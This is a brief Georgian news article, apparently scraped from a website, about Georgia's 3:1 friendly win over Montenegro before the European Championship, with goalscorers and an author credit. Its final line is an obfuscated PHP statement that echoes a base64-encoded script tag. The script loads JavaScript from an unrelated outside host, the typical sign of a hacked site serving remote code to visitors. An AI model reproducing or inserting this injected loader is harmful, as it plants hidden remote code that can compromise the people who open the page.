celsiusi
ავერსი საქკაბელი

საქართველოს საფეხბურთო ნაკრებმა მონტენეგრო დაამარცხა.

საქართველოს საფეხბურთო ნაკრებმა ევროპის ჩემპიონატზე გერმანიაში გამგზავრების წინ საკონტროლო მატჩი მონტენეგროს ნაკრებთან გამართა.

აქართველოს ნაკრებმა თამაში შესანიშნავად ჩაატარა და უამრავი საგოლე მომენტი შექმნა…   ანგარიში ოთარ კიტეიშვილმა ზუსტი დარტყმით გახსნა.

34-ე წუთზე "ჯვაროსნებმა" მეორე გოლიც გაიტანეს – კვარაცხელიამ შესანიშნავი გადაცემით მიქაუტაძე მეკარესთან პირისპირ დატოვა და მან სხვაობა ორამდე გაზარდა.

იოვეტიჩმა კი 66-ე წუთზე სტეფან მუგოსას „კედელი“ გაუთამაშა და საჯარიმოს სიახლოვიდან ზუსტი დარტყმით სხვაობა შეამცირა.

83-ე წუთზე ბუდუ ზივზივაძემ გოლი გაიტანა და ანგარიში 3:1 -ნ მდე გაზარდა. 

მატჩი 3:1 საქართველოს ნაკრების გამარჯვებით დასრულდა.

 

ავტორი
სანდრო ჭითანავა
306
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");